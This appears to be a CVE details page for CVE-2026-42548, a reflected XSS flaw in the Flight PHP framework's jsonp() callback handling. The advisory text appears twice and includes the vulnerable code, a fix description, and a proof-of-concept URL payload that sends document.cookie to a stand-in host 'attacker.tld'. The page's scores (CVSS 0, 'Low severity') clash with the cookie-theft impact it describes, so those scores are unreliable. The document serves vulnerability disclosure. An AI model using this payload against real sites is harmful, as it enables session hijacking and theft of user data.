What is the severity of CVE-2026-42548?

CVE-2026-42548 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-42548?

No known public exploits are currently available for CVE-2026-42548.

Is there a patch available for CVE-2026-42548?

Yes, patches are available for CVE-2026-42548. Check the vendor advisories for update instructions.

CVE-2026-42548 - CVE Details, Severity, and Analysis

Q: What is CVE-2026-42548?

### Summary `Flight::jsonp()` concatenates the `?jsonp=` query parameter directly into an `application/javascript` response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting. ### Affected code `flight/Engine.php` (≈ lines 1000-1013): ```php $callback = $this->request()->query[$param]; $this->response() ->status($code) ->header('Content-Type', 'application/javascript; charset=' . $charset) ->write($callback . '(' . $json . ');'); ``` No regex or identifier validation is performed before the callback is written. ### Proof of concept Given any route that calls `Flight::jsonp($data)`: ``` GET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);// ``` Reproduced response (`Content-Type: application/javascript`): ``` ;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({"ok":true,"msg":"hello"}); ``` When the vulnerable endpoint is loaded via ` ` on a page controlled by the attacker, the injected JavaScript executes in the `victim.tld` origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow. ### Impact - Reflected XSS in any application calling `Flight::jsonp()`. - Cookie theft / session hijack when JSONP endpoints are referenced from same-origin pages. - Exfiltration of authenticated API responses. ### Patch (fixed in `3.18.1`, commit `b8dd23a`) `_jsonp()` now validates the callback name against `^[A-Za-z_$][\w$.]{0,127}$` before emitting it. An empty callback (no `jsonp` parameter) still behaves as before. ### Credit Discovered by **@Rootingg**.

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

Flight::jsonp() concatenates the ?jsonp= query parameter directly into an application/javascript response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting.

Affected code

flight/Engine.php (≈ lines 1000-1013):

$callback = $this->request()->query[$param];
$this->response()
    ->status($code)
    ->header('Content-Type', 'application/javascript; charset=' . $charset)
    ->write($callback . '(' . $json . ');');

No regex or identifier validation is performed before the callback is written.

Proof of concept

Given any route that calls Flight::jsonp($data):

GET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//

Reproduced response (Content-Type: application/javascript):

;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({"ok":true,"msg":"hello"});

When the vulnerable endpoint is loaded via <script src="https://victim.tld/api?jsonp=…"> on a page controlled by the attacker, the injected JavaScript executes in the victim.tld origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow.

Impact

Reflected XSS in any application calling Flight::jsonp().
Cookie theft / session hijack when JSONP endpoints are referenced from same-origin pages.
Exfiltration of authenticated API responses.

Patch (fixed in `3.18.1`, commit `b8dd23a`)

_jsonp() now validates the callback name against ^[A-Za-z_$][\w$.]{0,127}$ before emitting it. An empty callback (no jsonp parameter) still behaves as before.

Credit

Discovered by @Rootingg.

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Ready for Agentic Automated Testing?

CVE-2026-42548